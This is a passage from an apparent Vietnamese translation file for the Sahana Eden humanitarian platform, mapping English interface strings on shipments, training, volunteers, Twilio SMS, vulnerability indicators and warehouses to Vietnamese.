khi người yêu cầu xác nhận yêu cầu đã hoàn tất.', 'The synchronization module allows the synchronization of data resources between Sahana Eden instances.': 'Mô đun đồng bộ hóa cho phép đồng bộ hóa nguồn dữ liệu giữa các phiên bản Sahana Eden.', 'The system supports 2 projections by default:': 'Hệ thống hỗ trợ 2 dự thảo bởi chế độ mặc định:', 'The token associated with this application on': 'Mã thông báo liên quan đến ứng dụng này trên', 'The unique identifier which identifies this instance to other instances.': 'Yếu tố khác biệt phân biệt lần này với các lần khác', 'The uploaded Form is unreadable, please do manual data entry.': 'Mẫu được tải không thể đọc được, vui lòng nhập dữ liệu thủ công', 'The weight in kg.': 'Trọng lượng tính theo đơn vị kg.', 'Theme Data deleted': 'Dữ liệu Chủ đề đã xóa', 'Theme Data updated': 'Dữ liệu Chủ đề đã cập nhật', 'Theme Data': 'Dữ liệu Chủ đề', 'Theme Details': 'Chi tiết Chủ đề', 'Theme Layer': 'Lớp Chủ đề', 'Theme Sectors': 'Lĩnh vực của Chủ đề', 'Theme added': 'Chủ đề được thêm vào', 'Theme deleted': 'Chủ đề đã xóa', 'Theme removed': 'Chủ đề đã loại bỏ', 'Theme updated': 'Chủ đề đã cập nhật', 'Theme': 'Chủ đề', 'Themes': 'Chủ đề', 'There are multiple records at this location': 'Có nhiều bản lưu tại địa điểm này', 'There is a problem with your file.': 'Có vấn đề với tệp tin của bạn.', 'There is insufficient data to draw a chart from the questions selected': 'Không có đủ dữ liệu để vẽ biểu đồ từ câu hỏi đã chọn', 'There is no address for this person yet. Add new address.': 'Chưa có địa chỉ về người này. Hãy thêm địa chỉ.', 'There was a problem, sorry, please try again later.': 'Đã có vấn đề, xin lỗi, vui lòng thử lại sau.', 'These are settings for Inbound Mail.': 'Đây là những cài đặt cho Hộp thư đến.', 'These are the Incident Categories visible to normal End-Users': 'Đây là những Nhóm Sự kiện hiển thị cho Người dùng Cuối cùng thông thường.', 'These are the filters being used by the search.': 'Đây là những bộ lọc sử dụng cho tìm kiếm.', 'These need to be added in Decimal Degrees.': 'Cần thêm vào trong Số các chữ số thập phân.', 'They': 'Người ta', 'This Group has no Members yet': 'Hiện không có hội viên nào được đăng ký', 'This Team has no Members yet': 'Hiện không có hội viên nào được đăng ký', 'This adjustment has already been closed.': 'Điều chỉnh này đã đóng.', 'This email-address is already registered.': 'Địa chỉ email này đã được đăng ký.', 'This form allows the administrator to remove a duplicate location.': 'Mẫu này cho phép quản trị viên xóa bỏ các địa điểm trùng', 'This is appropriate if this level is under construction. To prevent accidental modification after this level is complete, this can be set to False.': 'Lựa chọn này phù hợp nếu cấp độ này đang được xây dựng. Để không vô tình chỉnh sửa sau khi hoàn tất cấp độ này, lựa chọn này có thể được đặt ở giá trị Sai.', 'This is normally edited using the Widget in the Style Tab in the Layer Properties on the Map.': 'Điều này thông thường được chỉnh sửa sử dụng Công cụ trong Mục Kiểu dáng trong Các đặc trưng của Lớp trên Bản đồ.', 'This is the full name of the language and will be displayed to the user when selecting the template language.': 'Đây là tên đầy đủ của ngôn ngữ và sẽ được thể hiện với người dùng khi lựa chọn ngôn ngữ.', 'This is the name of the parsing function used as a workflow.': 'Đây là tên của chức năng phân tích cú pháp được sử dụng như là một chuỗi công việc.', 'This is the name of the username for the Inbound Message Source.': 'Đây là tên của người dùng cho Nguồn tin nhắn đến.', 'This is the short code of the language and will be used as the name of the file. This should be the ISO 639 code.': 'Đây là mã ngắn gọn của ngôn ngữ và sẽ được sử dụng làm tên của tệp tin. Mã này nên theo mã ISO 639.', 'This is the way to transfer data between machines as it maintains referential integrity.': 'Đây là cách truyền dữ liệu giữa các máy vì nó bảo toàn tham chiếu', 'This job has already been finished successfully.': 'Công việc đã được thực hiện thành công.', 'This level is not open for editing.': 'Cấp độ này không cho phép chỉnh sửa.', 'This might be due to a temporary overloading or maintenance of the server.': 'Điều này có lẽ là do máy chủ đang quá tải hoặc đang được bảo trì.', 'This module allows Warehouse Stock to be managed, requested & shipped between the Warehouses and Other Inventories': 'Chức năng này giúp việc quản lý, đặt yêu cầu và di chuyển hàng lưu trữ giữa các kho hàng và các vị trí lưu trữ khác trong kho', 'This resource cannot be displayed on the map!': 'Nguồn lực này không thể hiện trên bản đồ!', 'This resource is already configured for this repository': 'Nguồn lực này đã được thiết lập cấu hình cho kho hàng này', 'This role can not be assigned to users.': 'Chức năng không thể cấp cho người sử dụng', 'This screen allows you to upload a collection of photos to the server.': 'Màn hình này cho phép bạn đăng tải một bộ sưu tập hình ảnh lên máy chủ.', 'This shipment contains %s items': 'Lô hàng này chứa %s mặt hàng', 'This shipment contains one item': 'Lô hàng này chứa một mặt hàng', 'This shipment has already been received & subsequently canceled.': 'Lô hàng này đã được nhận & về sau bị hủy.', 'This shipment has already been received.': 'Lô hàng này đã được nhận.', 'This shipment has already been sent.': 'Lô hàng này đã được gửi.', 'This shipment has not been received - it has NOT been canceled because it can still be edited.': 'Lô hàng này chưa được nhận - KHÔNG bị hủy vì vẫn có thể điều chỉnh.', 'This shipment has not been returned.': 'Lô hàng này chưa được trả lại.', 'This shipment has not been sent - it cannot be returned because it can still be edited.': 'Lô hàng này chưa được gửi - không thể trả lại vì vẫn có thể điều chỉnh.', 'This shipment has not been sent - it has NOT been canceled because it can still be edited.': 'Lô hàng này chưa được gửi - KHÔNG bị hủy vì vẫn có thể điều chỉnh.', 'This should be an export service URL': 'Có thể đây là một dịch vụ xuất URL', 'Thunderstorm': 'Giông bão', 'Thursday': 'Thứ Năm', 'Ticket Details': 'Chi tiết Ticket', 'Ticket Viewer': 'Người kiểm tra vé', 'Ticket deleted': 'Đã xóa Ticket', 'Ticket': 'Vé', 'Tickets': 'Vé', 'Tiled': 'Lợp', 'Time Actual': 'Thời gian thực tế', 'Time Estimate': 'Ước lượng thời gian', 'Time Estimated': 'Thời gian dự đoán', 'Time Frame': 'Khung thời gian', 'Time In': 'Thời điểm vào', 'Time Log Deleted': 'Lịch trình thời gian đã xóa', 'Time Log Updated': 'Lịch trình thời gian đã cập nhật', 'Time Log': 'Lịch trình thời gian', 'Time Logged': 'Thời gian truy nhập', 'Time Out': 'Thời gian thoát', 'Time Question': 'Câu hỏi thời gian', 'Time Taken': 'Thời gian đã dùng', 'Time of Request': 'Thời gian yêu cầu', 'Time': 'Thời gian', 'Timeline': 'Nhật ký', 'Title to show for the Web Map Service panel in the Tools panel.': 'Tiêu đề thể hiện với bảng Dịch vụ Bản đồ Mạng trong bảng Công cụ.', 'Title': 'Tiêu đề', 'To Organization': 'Tới Tổ chức', 'To Person': 'Tới Người', 'To Warehouse/Facility/Office': 'Tới Nhà kho/Bộ phận/Văn phòng', 'To begin the sync process, click the button on the right => ': 'Nhấp chuột vào nút bên phải để kích hoạt quá trình đồng bộ', 'To edit OpenStreetMap, you need to edit the OpenStreetMap settings in your Map Config': 'Để chỉnh sửa OpenStreetMap, bạn cần chỉnh sửa cài đặt OpenStreetMap trong cài đặt cấu hình bản đồ của bạn.', 'To variable': 'Tới biến số', 'To': 'Tới', 'Tools and Guidelines Development': 'Xây dựng các hướng dẫn và công cụ', 'Tools': 'Công cụ', 'Tornado': 'Lốc xoáy', 'Total # of Target Beneficiaries': 'Tổng số # đối tượng hưởng lợi', 'Total Annual Budget': 'Tổng ngân sách hàng năm', 'Total Cost per Megabyte': 'Tổng chi phí cho mỗi Megabyte', 'Total Cost': 'Giá tổng', 'Total Funding Amount': 'Tổng số tiền hỗ trợ', 'Total Locations': 'Tổng các vị trí', 'Total Persons': 'Tổng số người', 'Total Recurring Costs': 'Tổng chi phí định kỳ', 'Total Value': 'Giá trị tổng', 'Total number of beds in this hospital. Automatically updated from daily reports.': 'Tổng số giường bệnh trong bệnh viện này. Tự động cập nhật từ các báo cáo hàng ngày.', 'Total number of houses in the area': 'Tổng số nóc nhà trong khu vực', 'Total number of schools in affected area': 'Số lượng trường học trong khu vực chịu ảnh hưởng thiên tai', 'Total': 'Tổng', 'Tourist Group': 'Nhóm khách du lịch', 'Tracing': 'Đang tìm kiếm', 'Track Shipment': 'Theo dõi lô hàng', 'Track with this Person?': 'Theo dõi Người này?', 'Track': 'Dấu viết', 'Trackable': 'Có thể theo dõi được', 'Tracking and analysis of Projects and Activities.': 'Giám sát và phân tích Dự án và Hoạt động', 'Traffic Report': 'Báo cáo giao thông', 'Training (Count)': 'Tập huấn (Số lượng)', 'Training Course Catalog': 'Danh mục khóa tập huấn', 'Training Courses': 'Khóa tập huấn', 'Training Details': 'Chi tiết về khóa tập huấn', 'Training Event Details': 'Chi tiết về khóa tập huấn', 'Training Event added': 'Khóa tập huấn được thêm vào', 'Training Event deleted': 'Khóa tập huấn đã xóa', 'Training Event updated': 'Khóa tập huấn đã cập nhật', 'Training Event': 'Khóa tập huấn', 'Training Events': 'Khóa tập huấn', 'Training Facility': 'Đơn vị đào tạo', 'Training Hours (Month)': 'Thời gian tập huấn (Tháng)', 'Training Hours (Year)': 'Thời gian tập huấn (Năm)', 'Training Report': 'Tập huấn', 'Training added': 'Tập huấn được thêm vào', 'Training deleted': 'Tập huấn đã xóa', 'Training of Master Trainers/ Trainers': 'Tập huấn Giảng viên/ Giảng viên nguồn', 'Training Sector': 'Lĩnh vực tập huấn', 'Training updated': 'Tập huấn đã cập nhật', 'Training': 'Tập huấn', 'Trainings': 'Tập huấn', 'Transfer Ownership To (Organization/Branch)': 'Chuyển Quyền sở hữu cho (Tổ chức/ Chi nhánh)', 'Transfer Ownership': 'Chuyển Quyền sở hữu', 'Transfer': 'Chuyển giao', 'Transit Status': 'Tình trạng chuyển tiếp', 'Transit': 'Chuyển tiếp', 'Transitional Shelter Construction': 'Xây dựng nhà tạm', 'Transitional Shelter': 'Nhà tạm', 'Translate': 'Dịch', 'Translated File': 'File được dịch', 'Translation Functionality': 'Chức năng Dịch', 'Translation': 'Dịch', 'Transparent?': 'Có minh bạch không?', 'Transportation Required': 'Cần vận chuyển', 'Transported By': 'Đơn vị vận chuyển', 'Tropical Storm': 'Bão nhiệt đới', 'Tropo Messaging Token': 'Mã thông báo tin nhắn Tropo', 'Tropo settings updated': 'Cài đặt Tropo được cập nhật', 'Truck': 'Xe tải', 'Try checking the URL for errors, maybe it was mistyped.': 'Kiểm tra đường dẫn URL xem có lỗi không, có thể đường dẫn bị gõ sai.', 'Try hitting refresh/reload button or trying the URL from the address bar again.': 'Thử nhấn nút làm lại/tải lại hoặc thử lại URL từ trên thanh địa chỉ.', 'Try refreshing the page or hitting the back button on your browser.': 'Thử tải lại trang hoặc nhấn nút trở lại trên trình duyệt của bạn.', 'Tsunami': 'Sóng thần', 'Twilio SMS InBox': 'Hộp thư đến SMS twilio', 'Twilio SMS Inbox empty. ': 'Hộp thư đến Twilio trống.', 'Twilio SMS Inbox': 'Hộp thư đến Twilio', 'Twilio SMS Settings': 'Cài đặt SMS twilio', 'Twilio SMS deleted': 'Tin nhắn Twilio đã xóa', 'Twilio SMS updated': 'Tin nhắn Twilio được cập nhật', 'Twilio SMS': 'Tin nhắn Twilio', 'Twilio Setting Details': 'Chi tiết cài đặt Twilio', 'Twilio Setting added': 'Cài đặt Twilio được thêm vào', 'Twilio Setting deleted': 'Cài đặt Twilio đã xóa', 'Twilio Settings': 'Cài đặt Twilio', 'Twilio settings updated': 'Cài đặt Twilio được cập nhật', 'Twitter ID or #hashtag': 'Tên đăng nhập Twitter hay từ hay chuỗi các ký tự bắt đầu bằng dấu # (#hashtag)', 'Twitter Settings': 'Cài đặt Twitter', 'Type of Transport': 'Loại phương tiện giao thông', 'Type of adjustment': 'Loại hình điều chỉnh', 'Type': 'Đối tượng', 'Types of Activities': 'Các loại hình Hoạt động', 'Types': 'Các loại', 'UPDATE': 'CẬP NHẬT', 'URL for the twilio API.': 'URL cho twilio API.', 'URL of the default proxy server to connect to remote repositories (if required). If only some of the repositories require the use of a proxy server, you can configure this in the respective repository configurations.': 'URL của máy chủ trung chuyển mặc định để kết nối với các kho hàng ở khu vực xa (nếu cần thiết). Nếu chỉ có một số kho hàng cần một máy chủ trung chuyển sử dụng thì bạn có thể tạo cấu hình cho máy này tương ứng với cấu hình của kho hàng.', 'URL of the proxy server to connect to the repository (leave empty for default proxy)': 'URL của máy chủ trung chuyển để kết nối với kho hàng (để trống với phần ủy nhiệm mặc định)', 'URL to a Google Calendar to display on the project timeline.': 'URL đến Lịch Google để thể hiện dòng thời gian của dự án.', 'UTC Offset': 'Độ xê dịch giờ quốc tế', 'Un-Repairable': 'Không-Sửa chữa được', 'Unable to find sheet %(sheet_name)s in uploaded spreadsheet': 'Không thể tìm thấy bảng %(sheet_name)s trong bảng tính đã đăng tải', 'Unable to open spreadsheet': 'Không thể mở được bảng tính', 'Unable to parse CSV file or file contains invalid data': 'Không thể cài đặt cú pháp cho file CSV hoặc file chức dữ liệu không hợp lệ', 'Unable to parse CSV file!': 'Không thể đọc file CSV', 'Unassigned': 'Chưa được điều động', 'Under 5': 'Dưới 5', 'Under which condition a local record shall be updated if it also has been modified locally since the last synchronization': 'Trong điều kiện nào thì một bản lưu nội bộ sẽ được cập nhật nếu bản lưu này cũng được điều chỉnh trong nội bộ kể từ lần đồng bộ hóa cuối cùng', 'Under which conditions local records shall be updated': 'Trong những điều kiện nào thì các bản lưu nội bộ sẽ được cập nhật', 'Unidentified': 'Không nhận dạng được', 'Unique Locations': 'Các địa điểm duy nhất', 'Unique identifier which THIS repository identifies itself with when sending synchronization requests.': 'Ký hiệu nhận dạng duy nhất để kho hàng NÀY nhận dạng chính nó khi gửi các đề nghị đồng bộ hóa.', 'Unit Cost': 'Đơn giá', 'Unit Short Code for e.g. m for meter.': 'Viết tắt các đơn vị, ví dụ m viết tắt của mét', 'Unit Value': 'Thành tiền', 'Unit added': 'Đã thêm đơn vị', 'Unit of Measure': 'Đơn vị đo', 'Unit updated': 'Đơn vị được cập nhật', 'Unit': 'Đơn vị', 'United States Dollars': 'Đô La Mỹ', 'Units': 'Các đơn vị', 'University / College': 'Đại học / Cao đẳng', 'Unknown Locations': 'Địa điểm không xác định', 'Unknown question code': 'Mã câu hỏi chưa được biết đến', 'Unknown': 'Chưa xác định', 'Unloading': 'Đang gỡ ra', 'Unselect to disable the modem': 'Thôi chọn để tạm ngừng hoạt động của mô đem', 'Unselect to disable this API service': 'Thôi chọn để tạm ngừng dịch vụ API này', 'Unselect to disable this SMTP service': 'Thôi chọn để tạm ngừng dịch vụ SMTP này', 'Unsent': 'Chưa được gửi', 'Unspecified': 'Không rõ', 'Unsupported data format': 'Định dạng dữ liệu không được hỗ trợ', 'Unsupported method': 'Phương pháp không được hỗ trợ', 'Update Map': 'Cập nhật Bản đồ', 'Update Master file': 'Cập nhật tệp tin Gốc', 'Update Method': 'Cập nhật Phương pháp', 'Update Policy': 'Cập nhật Chính sách', 'Update Report': 'Cập nhật báo cáo', 'Update Request': 'Cập nhật Yêu cầu', 'Update Service Profile': 'Cập nhật hồ sơ đăng ký dịch vụ', 'Update Status': 'Cập nhật Tình trạng', 'Update Task Status': 'Cập nhật tình trạng công việc ', 'Update this entry': 'Cập nhật hồ sơ này', 'Updated By': 'Được cập nhật bởi', 'Upload .CSV': 'Tải lên .CSV', 'Upload Completed Assessment Form': 'Tải lên Mẫu đánh giá đã hoàn thiện', 'Upload Format': 'Tải định dạng', 'Upload Photos': 'Tải lên Hình ảnh', 'Upload Scanned OCR Form': 'Tải mẫu scan OCR', 'Upload Web2py portable build as a zip file': 'Tải lên Web2py như một tệp nén', 'Upload a Question List import file': 'Tải lên một tệp tin được chiết xuất chứa Danh sách các câu hỏi', 'Upload a Spreadsheet': 'Tải một bảng tính lên', 'Upload a text file containing new-line separated strings:': 'Tải lên một tệp tin văn bản chứa các chuỗi được tách thành dòng mới:', 'Upload an Assessment Template import file': 'Tải lên một tệp tin được chiết xuất chứa Biểu mẫu Khảo sát đánh giá', 'Upload an image file (png or jpeg), max. 400x400 pixels!': 'Tải lên file hình ảnh (png hoặc jpeg) có độ phân giải tối đa là 400x400 điểm ảnh!', 'Upload demographic data': 'Tải lên dữ liệu nhân khẩu', 'Upload file': 'Tải file', 'Upload indicators': 'Tải lên các chỉ số', 'Upload successful': 'Tải lên thành công', 'Upload the (completely or partially) translated csv file': 'Tải lên (toàn bộ hoặc một phần) tệp tin csv đã được chuyển ngữ', 'Upload the Completed Assessment Form': 'Tải lên Mẫu đánh giá', 'Upload translated files': 'Tải file được dịch', 'Upload': 'Tải lên', 'Uploaded PDF file has more/less number of page(s) than required. Check if you have provided appropriate revision for your Form as well as check the Form contains appropriate number of pages.': '', 'Uploaded file is not a PDF file. Provide a Form in valid PDF Format.': 'File được tải không phải định dạng PDF. Cung cấp mẫu ở định dạng PDF', 'Uploading report details': 'Đang tải lên các chi tiết báo cáo', 'Urban Fire': 'Cháy trong thành phố', 'Urban Risk & Planning': 'Quy hoạch đô thị và Rủi ro đô thị', 'Urdu': 'Ngôn ngữ Urdu(một trong hai ngôn ngữ chính thức tại Pakistan', 'Urgent': 'Khẩn cấp', 'Use (...)&(...) for AND, (...)|(...) for OR, and ~(...) for NOT to build more complex queries.': 'Sử dụng (...)&(...) cho VÀ, (...)|(...) cho HOẶC, và ~(...) cho KHÔNG để tạo ra những câu hỏi phức tạp hơn.', 'Use Geocoder for address lookups?': 'Sử dụng Geocoder để tìm kiếm địa chỉ?', 'Use Translation Functionality': 'Sử dụng Chức năng Dịch', 'Use decimal': 'Sử dụng dấu phẩy', 'Use default': 'Sử dụng cài đặt mặc định', 'Use deg, min, sec': 'Sử dụng độ, phút, giây', 'Use these links to download data that is currently in the database.': 'Dùng liên kết này để tải dữ liệu hiện có trên cơ sở dữ liệu xuống', 'Use this space to add a description about the Bin Type.': 'Thêm thông tin mô tả loại Bin ở đây', 'Use this space to add a description about the warehouse/site.': 'Thêm mô tả nhà kho/site ở đây', 'Use this space to add additional comments and notes about the Site/Warehouse.': 'Viết bình luận và ghi chú về site/nhà kho ở đây', 'Use this to set the starting location for the Location Selector.': 'Sử dụng cái này để thiết lập địa điểm xuất phát cho Bộ chọn lọc Địa điểm.', 'Used in onHover Tooltip & Cluster Popups to differentiate between types.': 'Đã dùng trong onHover Tooltip & Cluster Popups để phân biệt các loại', 'Used to build onHover Tooltip & 1st field also used in Cluster Popups to differentiate between records.': 'Đã dùng để xây dựng onHover Tooltip & trường thứ nhất cũng đã sử dụng trong Cluster Popups phân biệt các hồ sơ.', 'Used to check that latitude of entered locations is reasonable. May be used to filter lists of resources that have locations.': 'Được sử dụng để kiểm tra vĩ độ của những địa điểm được nhập có chính xác không. Có thể được sử dụng để lọc danh sách các nguồn lực có địa điểm.', 'Used to check that longitude of entered locations is reasonable. May be used to filter lists of resources that have locations.': 'Được sử dụng để kiểm tra kinh độ của những địa điểm được nhập có chính xác không. Có thể được sử dụng để lọc danh sách các nguồn lực có địa điểm.', 'User Account has been Approved': 'Tài khoản của người sử dụng đã được duyệt', 'User Account has been Disabled': 'Tài khoản của người sử dụng đã bị ngưng hoạt động', 'User Account': 'Tài khoản của người sử dụng', 'User Details': 'Thông tin về người sử dụng', 'User Guidelines Synchronization': 'Đồng bộ hóa Hướng dẫn cho Người sử dụng', 'User Management': 'Quản lý người dùng', 'User Profile': 'Hồ sơ người sử dụng', 'User Requests': 'Yêu cầu của người dùng', 'User Roles': 'Vai trò của người sử dụng', 'User Updated': 'Đã cập nhât người dùng', 'User added to Role': 'Người sử dụng được thêm vào chức năng', 'User added': 'Người sử dụng được thêm vào', 'User deleted': 'Người sử dụng đã xóa', 'User has been (re)linked to Person and Human Resource record': 'Người sử dụng đã được liên kết thành công', 'User updated': 'Người sử dụng được cập nhật', 'User with Role': 'Người sử dụng có chức năng này', 'User': 'Người sử dụng', 'Username to use for authentication at the remote site.': 'Tên người sử dụng dùng để xác nhận tại khu vực ở xa.', 'Username': 'Tên người sử dụng', 'Users in my Organizations': 'Những người dùng trong tổ chức của tôi', 'Users removed': 'Xóa người dùng', 'Users with this Role': 'Những người sử dụng với chức năng này', 'Users': 'Danh sách người dùng', 'Uses the REST Query Format defined in': 'Sử dụng Định dạng câu hỏi REST đã được xác định trong', 'Ushahidi Import': 'Nhập Ushahidi', 'Utilization Details': 'Chi tiết về Việc sử dụng', 'Utilization Report': 'Báo cáo quá trình sử dụng', 'VCA (Vulnerability and Capacity Assessment': 'VCA (Đánh giá Tình trạng dễ bị tổn thương và Khả năng)', 'VCA REPORTS': 'BÁO CÁO VCA', 'VCA Report': 'Báo cáo VCA', 'Valid From': 'Có hiệu lực từ', 'Valid Until': 'Có hiệu lực đến', 'Valid': 'Hiệu lực', 'Validation error': 'Lỗi xác thực', 'Value per Pack': 'Giá trị mỗi gói', 'Value': 'Giá trị', 'Vector Control': 'Kiểm soát Vec-tơ', 'Vehicle Assignment updated': 'Việc điệu động xe được cập nhật', 'Vehicle Assignments': 'Các việc điều động xe', 'Vehicle Crime': 'Tội phạm liên quan đến xe', 'Vehicle Details': 'Thông tin về xe', 'Vehicle Plate Number': 'Biển số xe', 'Vehicle Types': 'Loại phương tiện di chuyển', 'Vehicle assigned': 'Xe được điều động', 'Vehicle unassigned': 'Xe chưa được điều động', 'Vehicle': 'Xe', 'Vehicles': 'Phương tiện di chuyển', 'Venue': 'Địa điểm tổ chức', 'Verified': 'Đã được thẩm định', 'Verified?': 'Đã được thẩm định?', 'Verify Password': 'Kiểm tra mật khẩu', 'Verify password': 'Kiểm tra mật khẩu', 'Version': 'Phiên bản', 'Very Good': 'Rất tốt', 'Very Strong': 'Rất mạnh', 'Vietnamese': 'Tiếng Việt', 'View Alerts received using either Email or SMS': 'Xem các Cảnh báo nhận được sử dụng thư điện tử hoặc tin nhắn', 'View All': 'Xem tất cả', 'View Email InBox': 'Xem hộp thư điện tử đến', 'View Email Settings': 'Xem cài đặt thư điện tử', 'View Error Tickets': 'Xem các vé lỗi', 'View Fullscreen Map': 'Xem bản đồ toàn màn hình', 'View Items': 'Xem các mặt hàng', 'View Location Details': 'Xem chi tiết vị trí', 'View Outbox': 'Xem hộp thư điện tử đi', 'View Reports': 'Xem báo cáo', 'View Requests for Aid': 'Xem Yêu cầu viện trợ', 'View Settings': 'Xem cài đặt', 'View Test Result Reports': 'Xem báo cáo kết quả kiểm tra', 'View Translation Percentage': 'Xem tỷ lệ phần trăm chuyển đổi', 'View Twilio SMS': 'Xem tin nhắn văn bản Twilio', 'View Twilio Settings': 'Xem các Cài đặt Twilio', 'View all log entries': 'Xem toàn bộ nhật ký ghi chép', 'View as Pages': 'Xem từng trang', 'View full size': 'Xem kích thước đầy đủ', 'View log entries per repository': 'Xem ghi chép nhật ký theo kho hàng', 'View on Map': 'Xem trên bản đồ', 'View or update the status of a hospital.': 'Xem hoặc cập nhật trạng thái của một bệnh viện', 'View the hospitals on a map.': 'Hiển thị bệnh viện trên bản đồ', 'View the module-wise percentage of translated strings': 'Xem phần trăm ', 'View': 'Xem', 'View/Edit the Database directly': 'Trực tiếp Xem/Sửa Cơ sở dữ liệu', 'Village / Suburb': 'Thôn / Xóm', 'Violence Prevention': 'Phòng ngừa bạo lực', 'Vocational School/ College': 'Trung cấp/ Cao đẳng', 'Volcanic Ash Cloud': 'Mây bụi núi lửa', 'Volcanic Event': 'Sự kiện phun trào núi lửa', 'Volcano': 'Núi lửa', 'Volume (m3)': 'Thể tích (m3)', 'Volunteer Cluster Position added': 'Vị trí Nhóm Tình nguyện viên được thêm vào', 'Volunteer Cluster Position deleted': 'Vị trí Nhóm Tình nguyện viên đã xóa', 'Volunteer Cluster Position updated': 'Vị trí Nhóm Tình nguyện viên được cập nhật', 'Volunteer Cluster Position': 'Vị trí Nhóm Tình nguyện viên', 'Volunteer Cluster Type added': 'Mô hình Nhóm Tình nguyện viên được thêm vào', 'Volunteer Cluster Type deleted': 'Mô hình Nhóm Tình nguyện viên đã xóa', 'Volunteer Cluster Type updated': 'Mô hình Nhóm Tình nguyện viên được cập nhật', 'Volunteer Cluster Type': 'Mô hình Nhóm Tình nguyện viên', 'Volunteer Cluster added': 'Nhóm Tình nguyện viên được thêm vào', 'Volunteer Cluster deleted': 'Nhóm Tình nguyện viên đã xóa', 'Volunteer Cluster updated': 'Nhóm Tình nguyện viên được cập nhật', 'Volunteer Cluster': 'Nhóm Tình nguyện viên', 'Volunteer Data': 'Dữ liệu tình nguyện viên', 'Volunteer Details updated': 'Thông tin về Tình nguyện viên được cập nhật', 'Volunteer Details': 'Thông tin về Tình nguyện viên', 'Volunteer Management': 'Quản lý tình nguyện viên', 'Volunteer Project': 'Dự án tình nguyện', 'Volunteer Record': 'Hồ sơ TNV', 'Volunteer Registration': 'Đăng ký tình nguyện viên', 'Volunteer Registrations': 'Đăng ksy tình nguyện viên', 'Volunteer Report': 'Tình nguyện viên', 'Volunteer Request': 'Đề nghị Tình nguyện viên', 'Volunteer Role (Count)': 'Chức năng nhiệm vụ TNV (Số lượng)', 'Volunteer Role Catalog': 'Danh mục về Vai trò của Tình nguyện viên', 'Volunteer Role Catalogue': 'Danh mục vai trò TNV', 'Volunteer Role Details': 'Chi tiết về Vai trò của Tình nguyện viên', 'Volunteer Role added': 'Vai trò của Tình nguyện viên được thêm vào', 'Volunteer Role deleted': 'Vai trò của Tình nguyện viên đã xóa', 'Volunteer Role updated': 'Vai trò của Tình nguyện viên được cập nhật', 'Volunteer Role': 'Chức năng nhiệm vụ TNV', 'Volunteer Roles': 'Chức năng nhiệm vụ TNV', 'Volunteer Service Record': 'Bản lưu Dịch vụ Tình nguyện viên', 'Volunteer added': 'Tình nguyện viên được thêm vào', 'Volunteer and Staff Management': 'Quản lý TNV và Cán bộ', 'Volunteer deleted': 'Tình nguyện viên đã xóa', 'Volunteer registration added': 'Đã thêm đăng ký tình nguyện viên', 'Volunteer registration deleted': 'Đã xóa đăng ký tình nguyện viên', 'Volunteer registration updated': 'Đã cập nhật đăng ký tình nguyện viên', 'Volunteer': 'Tình nguyện viên', 'Volunteers': 'Tình nguyện viên', 'Votes': 'Bình chọn', 'Vulnerability Aggregated Indicator Details': 'Chi tiết về chỉ số tổng hợp về Tình trạng dễ bị tổn thương', 'Vulnerability Aggregated Indicator added': 'Chỉ số tổng hợp về Tình trạng dễ bị tổn thương được thêm vào', 'Vulnerability Aggregated Indicator deleted': 'Chỉ số tổng hợp về Tình trạng dễ bị tổn thương đã xóa', 'Vulnerability Aggregated Indicator updated': 'Chỉ số tổng hợp về Tình trạng dễ bị tổn thương được cập nhật', 'Vulnerability Aggregated Indicator': 'Chỉ số tổng hợp về Tình trạng dễ bị tổn thương', 'Vulnerability Aggregated Indicators': 'Các chỉ số tổng hợp về Tình trạng dễ bị tổn thương', 'Vulnerability Data Details': 'Dữ liệu chi tiết về Tình trạng dễ bị tổn thương', 'Vulnerability Data added': 'Dữ liệu về Tình trạng dễ bị tổn thương được thêm vào', 'Vulnerability Data deleted': 'Dữ liệu về Tình trạng dễ bị tổn thương đã xóa', 'Vulnerability Data updated': 'Dữ liệu về Tình trạng dễ bị tổn thương được cập nhật', 'Vulnerability Data': 'Dữ liệu về Tình trạng dễ bị tổn thương', 'Vulnerability Indicator Details': 'Chỉ số chi tiết về Tình trạng dễ bị tổn thương', 'Vulnerability Indicator Source Details': 'Chi tiết Nguồn Chỉ số về Tình trạng dễ bị tổn thương', 'Vulnerability Indicator Sources': 'Các Nguồn Chỉ số về Tình trạng dễ bị tổn thương', 'Vulnerability Indicator added': 'Chỉ số về Tình trạng dễ bị tổn thương được thêm vào', 'Vulnerability Indicator deleted': 'Chỉ số về Tình trạng dễ bị tổn thương đã xóa', 'Vulnerability Indicator updated': 'Chỉ số về Tình trạng dễ bị tổn thương được cập nhật', 'Vulnerability Indicator': 'Chỉ số về Tình trạng dễ bị tổn thương', 'Vulnerability Indicators': 'Các Chỉ số về Tình trạng dễ bị tổn thương', 'Vulnerability Mapping': 'Vẽ bản đồ về Tình trạng dễ bị tổn thương', 'Vulnerability indicator sources added': 'Các nguồn chỉ số về Tình trạng dễ bị tổn thương được thêm vào', 'Vulnerability indicator sources deleted': 'Các nguồn chỉ số về Tình trạng dễ bị tổn thương đã xóa', 'Vulnerability indicator sources updated': 'Các nguồn chỉ số về Tình trạng dễ bị tổn thương được cập nhật', #'Vulnerability': 'Tình trạng dễ bị tổn thương', 'Vulnerability': 'TTDBTT', 'Vulnerable Populations': 'Đối tượng dễ bị tổn thương', 'WARNING': 'CẢNH BÁO', 'WATSAN': 'NSVS', 'WAYBILL': 'VẬN ĐƠN', 'WFS Layer': 'Lớp WFS', 'WGS84 (EPSG 4236) is required for many WMS servers.': 'WGS84 (EPSG 4236) cần có cho nhiều máy chủ WMS.', 'WMS Layer': 'Lớp WMS', 'Warehouse Details': 'Thông tin về Nhà kho', 'Warehouse Management': 'Quản lý kho hàng', 'Warehouse Stock Details': 'Thông tin về Hàng hóa trong kho', 'Warehouse Stock Report': 'Báo cáo Hàng hóa trong Nhà kho', 'Warehouse Stock updated': 'Hàng hóa trong kho được cập nhật', 'Warehouse Stock': 'Hàng trong kho', 'Warehouse added': 'Nhà kho được thêm vào', 'Warehouse deleted': 'Nhà kho đã xóa', 'Warehouse updated': 'Nhà kho được cập nhật', 'Warehouse': 'Nhà kho', 'Warehouse/Facility/Office (Recipient)': 'Nhà kho/Bộ phận/Văn phòng (Bên nhận)', 'Warehouse/Facility/Office': 'Nhà kho/Bộ phận/Văn phòng', 'Warehouses': 'Nhà kho', 'Water Sources': 'Các nguồn nước', 'Water Supply': 'Cung cấp nước sạch', 'Water and Sanitation': 'Nước sạch và Vệ sinh', 'Water gallon': 'Ga-lông nước', 'Water': 'Nước', 'Waterspout': 'Máng xối nước', 'Way Bill(s)': 'Hóa đơn thu phí đường bộ', 'Waybill Number': 'Số Vận đơn', 'We have tried': 'Chúng tôi đã cố gắng', 